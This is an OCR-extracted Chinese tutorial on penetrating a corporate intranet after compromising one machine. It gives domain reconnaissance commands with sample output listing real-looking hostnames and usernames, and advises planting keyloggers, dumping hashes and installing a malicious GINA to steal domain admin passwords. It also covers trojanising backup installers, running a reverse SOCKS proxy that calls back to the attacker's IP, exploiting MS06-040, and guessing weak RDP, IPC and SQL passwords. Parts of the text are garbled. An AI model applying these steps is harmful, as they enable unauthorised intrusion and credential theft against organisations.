1、內(nèi)網(wǎng)，很多人應(yīng)該形成了這個(gè)概念，很多大型網(wǎng)絡(luò)的外部網(wǎng)站或是服務(wù)器不一定有用，當(dāng)然 外網(wǎng)也是一個(gè)突破口。很多時(shí)候我們直接從外網(wǎng)入手，隨著安 全的不斷加固，已變得越來(lái) 越困難。那么黑客通常是怎么進(jìn)行內(nèi)網(wǎng)滲透的，內(nèi)網(wǎng)滲透又是怎樣與社會(huì)工程學(xué)聯(lián)系起來(lái)呢， 今天主要描述黑客內(nèi)網(wǎng)滲透的常用操作手 法，關(guān)于如何獲得內(nèi)網(wǎng)機(jī)器，請(qǐng)查找我以前的一 篇文章內(nèi)網(wǎng)滲透-如何打開(kāi)突破口。滲透的過(guò)程就是一個(gè)信息刺探、利用、思考、突破的過(guò)程。首先在我們獲得一臺(tái)內(nèi)網(wǎng)的機(jī)器 后應(yīng)該怎么做，當(dāng)然是信息刺探。一信息刺探1 當(dāng) 前機(jī)器的人物身份，當(dāng)前控制的這臺(tái)機(jī)器人物是一個(gè)什么樣的身份，客服、銷(xiāo)售人 員還是開(kāi)發(fā)人員，還是管理員?？头?huì)

2、做些什么，會(huì)通過(guò)什么方式跟其它人聯(lián)系； 開(kāi)發(fā)人 員在開(kāi)發(fā)什么，應(yīng)該會(huì)跟管理員聯(lián)系，也會(huì)有一定的外網(wǎng)管理權(quán)限和內(nèi)網(wǎng)測(cè)試服務(wù)器，這種 情況下內(nèi)網(wǎng)測(cè)試服務(wù)器是可以搞定的。如果是客服機(jī)器或是銷(xiāo)售人 員機(jī)器呢，他一定有整 個(gè)公司或是網(wǎng)絡(luò)的聯(lián)系方式，自己發(fā)揮想象去。是管理員機(jī)器的話就不用說(shuō)。2 當(dāng)前網(wǎng)絡(luò)結(jié)構(gòu)的分析，是域結(jié)構(gòu)，還是劃分 vlan 的結(jié)構(gòu)，大多數(shù)大型網(wǎng)絡(luò)是域結(jié)構(gòu)。 一般外網(wǎng)的服務(wù)器都是有硬件防火墻的，并且指定內(nèi)網(wǎng)的某些機(jī)器的 mac 才可以連接。所以 我們先看看內(nèi)網(wǎng)情況：C:WINNTsystem32net view伺服器名稱(chēng) 說(shuō)明 2007ACCABS-XPACER-TS250 NAS 4B

3、AY SATAACER-TS500 NAS 4BAY SATAACER6100AKIRA-WU akira-wuALICECHENAMYCHIUANDY2007ANDYTEST01ANNHUANGANNIEKUOAPOLLOAPOPOARTSERVERAUGTCHIENAVSERVERBENLEE01BENSON-NB 先用netview查看內(nèi)網(wǎng)的情況，列出的機(jī)器就是在網(wǎng)絡(luò)結(jié)構(gòu)中有聯(lián)系的機(jī)器，但不一定都在 一個(gè)網(wǎng)段，所以ping出這些機(jī)器的ip,以便分析大概有哪些網(wǎng)段.3.了解本機(jī)在網(wǎng)絡(luò)中所占的角色先 ipconfig /all 看下是否在域中，如圖：C：WINNBsystem32ipccnf

4、ig /allWindows IP ConfigurationHost Name:Hybrid .:Hybrid .：No.：NoIP Routing Enabled. WINS Proxy Enabled. DNS Suffix Search List/www. neph. netEthernet adapter 隆域連線 2iConnection-specific DNS Suffix . :Description: Marvell YukonPCI-E ASF Gigabit Ethernet ControllerPhysical Address: 00-16-17-C6-69-18Dh

5、cp Enabled: YesAutocnfiguration Enabled . . . . ： YesIP Addresst lO,27.32.11Subnet Mask:255.255.255.fiDefault Gateway: 1 ,27.32.25DHCP Server：DNS Servers：從上圖，我們可以得知，存在一個(gè)域xxxx，從內(nèi)網(wǎng)ip來(lái)看，應(yīng)該還存在很多個(gè)段，內(nèi)網(wǎng)很 大。我們ping 一下域xxxx，得到域服務(wù)器的ip.我們?cè)賮?lái)看一下本機(jī)在域里面的角色,如圖：C:WINNTsystem32net Jcalgroup administrators別名 administra

6、tors註解Administrators可以完全不受限制地存取電腦闌域成員http:/www. nwph. netAdministratorAdminsQKGMadmin命令執(zhí)行成功?？磥?lái)只是一個(gè)普通域用戶.我們?cè)賮?lái)查看一下域里面的用戶.如圖：C:WINNTsystem32net user /domain這項(xiàng)要求巒更網(wǎng)域下的網(wǎng)域拄制站堪理 的咖師rp鼻的使用者帳戶1 購(gòu)曰 E6 A 鬪 E3-MFF-& 293(5833-1 II4 了如 CD 2D5CD13DA-501 -4C2-8 恥酮眈 E5-FE3C-4 閃 5-8 5E6BE33E-AED-4D95-9 eO58EFC5-F61 D

7、-4 咄 4-9 7DD9555jJ-389C-468-97DE63848-E66B-8D7-A875CC25-E30E-4iS9-AA781 EJl8-25D9-4CE /尹妙E麗畛智無(wú)科4計(jì)廠溜亨D磚甘卑5-4朗9-迂abshuangabuseACB2593A-7F5E-A77-0accaccountingadamadcontroladonhongadslinfcheckadslpvcasleenchenakirawualanchanalanlawalaniienalanlinaiberichouAlert =ogalexchinalexkinalexleealexyuaEicechena

8、licelinalindachangalienallenhuangallenlinamandahsiehamychsu域里面的用戶很多，那么我們?cè)俨榭匆幌掠蚬芾韱T有哪些：C:WINNTsystem32net group domain admins /domain這項(xiàng)要求會(huì)在網(wǎng)域下的綢域拄制站處理。群組名務(wù) Domain Admins註解指定的網(wǎng)域系統(tǒng)管理員感員 http:Z/www. ncph. netadcontrolexadminMossadmm命令執(zhí)行康如從上面我們掌握了內(nèi)網(wǎng)的大概信息。下面我們進(jìn)一步利用這些信息。二.信息的利用：1 首 先是內(nèi)網(wǎng)占據(jù)的這臺(tái)機(jī)器，要做幾個(gè)必要的措施： 1）

9、種鍵盤(pán)記錄，記錄其可能登錄 的密碼，有用的。2）抓hash跑密碼，主要查看密碼規(guī)則是否有規(guī)律，它的密碼也可以去試 下其它機(jī)器的密碼，看是否通用。3）種gina，這一步主要不是記錄當(dāng)前用戶的密碼，而是 為了來(lái)記錄域管理員的登錄密碼，因?yàn)橛蚬芾韱T是有 權(quán)限登錄下面每臺(tái)用戶的機(jī)器的,gina 是可以記到的，記到域管理密碼后，內(nèi)網(wǎng)在域中的機(jī)器就可以全部控制了。 4）給占據(jù)機(jī)器 上的備用安裝文件或是備用驅(qū) 動(dòng)上綁馬，此是為了防止對(duì)方重裝機(jī)器，馬就掉了。2 反彈 socks 代理。在內(nèi)網(wǎng)滲透中，反彈socks代理是很必要的，大家都知道用lex來(lái)轉(zhuǎn)發(fā)端口，好像很少看到 有人是直接反彈代理來(lái)連接。因?yàn)槲覀円B

10、接內(nèi)網(wǎng)的其 它機(jī)器，我們不可能一個(gè)一個(gè)的去 中轉(zhuǎn)端口連接，在當(dāng)前控制的機(jī)器上開(kāi)代理也沒(méi)辦法，因?yàn)閷?duì)方在內(nèi)網(wǎng)。所以我們就用反彈 代理的方式。這種方式其實(shí)大家都明 白。首先在本機(jī)監(jiān)聽(tīng)：c:hd -s -listen 53 1180+ Listening ConnectBack Port 53 + Listen OK!+ Listening Socks5 Agent Port 1180 + Listen2 OK!+ Waiting for MainSocket on port:53 此命令是將連接進(jìn)來(lái)的 53端口的數(shù)據(jù)包連接到 1180端口。 在對(duì)方機(jī)器上運(yùn)行:C:RECYCLERhd -s -co

11、nnect x.x.x.x 53+ MainSocket Connect to x.x.x.x:53 Success!+ Send Main Command ok!+ Recv Main Command ok!+ Send Main Command again ok!上面的x.x.x.x為你的外網(wǎng)ip,下面為你接收到反彈回來(lái)的代理顯示的情況。c:hd -s -listen 53 1180+ Listening ConnectBack Port 53 + Listen OK!+ Listening Socks5 Agent Port 1180 + Listen2 OK!+ Waiting for

12、 MainSocket on port:53 + Recv Main Command Echo ok!+ Send Main Command Echo ok!+ Recv Main Command Echo again ok!+ Get a MainSocket on port 53 from x.x.x.x + Waiting Client on Socks5 Agent Port:1180上面ok 了，接下來(lái)在你本機(jī)安裝sockscap，照下圖設(shè)置就ok 了。Sockscap 設(shè)置在控制臺(tái)的”文件”-“設(shè)置”里，控制臺(tái)可以將你需要代理的程序放在上面， 直接拖進(jìn)去即可，控制臺(tái)機(jī)的程序就可以進(jìn)

13、接連接 內(nèi)網(wǎng)的機(jī)器了。如直接用 mstsc 連接內(nèi) 網(wǎng)其它機(jī)器的 3389,就可以上去試密碼或是登錄管理，也可以用 mssql 連接內(nèi)網(wǎng)的 1433，嘗 試sa弱口令 等?？傊磸梥ocks是你利用已控制的內(nèi)網(wǎng)機(jī)器通向內(nèi)網(wǎng)其它機(jī)器的一道橋梁。 三思考：信息有了，通道有了，接下來(lái)我們?cè)趺醋觯? 內(nèi)網(wǎng)溢出,通過(guò)對(duì)內(nèi)網(wǎng)的掃描情況，判斷 win2000 的機(jī)器，利用 ms06040 進(jìn)行運(yùn)程溢出。內(nèi)網(wǎng)web,通過(guò)內(nèi)網(wǎng)的掃描，用sockscap上的ie來(lái)打開(kāi)內(nèi)網(wǎng)開(kāi)放的web,在內(nèi)網(wǎng)采用 web 注入或上傳的方式來(lái)獲取 webshell 提權(quán)。 內(nèi)網(wǎng)弱口令試探，利用ipc,或是3389,和已掌握的密碼信息

14、來(lái)嘗試猜解內(nèi)網(wǎng)nt的密碼, 當(dāng)然這需要耐心，也是非常有用的。猜解sql弱口令，在sockscap控制臺(tái)中用sql連接器連接內(nèi)網(wǎng)開(kāi)放1433或是3306的 機(jī)器，猜解弱口令。內(nèi)網(wǎng)嗅探，不得已的辦法，不推薦。內(nèi)網(wǎng)主動(dòng)會(huì)話劫持，篇幅長(zhǎng)，難度高，下次詳寫(xiě)。四.突破： 突破是考驗(yàn)經(jīng)驗(yàn)和思維的時(shí)候，利用已掌握的信息去突破面臨的困難。如，如何拿到第一臺(tái) 內(nèi)網(wǎng)服務(wù)器站穩(wěn)腳；如何拿到內(nèi)網(wǎng)到外網(wǎng)授權(quán)的機(jī)器；如何拿到外網(wǎng)密碼。在內(nèi)網(wǎng)中站穩(wěn)腳后，迅速判斷管理員機(jī)器，控制管理員的機(jī)器極為重要。一般從機(jī)器名可以 看出管理員機(jī)器，管理員的機(jī)器名常為：andy、admin、pet er、kat er,在域控的環(huán)境中， 我們只要得到域控密碼就可以直接用 ipc